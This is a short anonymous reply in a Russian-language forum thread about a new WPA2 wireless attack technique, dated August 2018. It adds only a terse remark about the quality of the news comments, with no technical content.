61. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от Аноним (61), 14-Авг-18, 21:34 
Как и комментарии к новости. Делай выводы.
Ответить | Правка | ^ к родителю #55 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру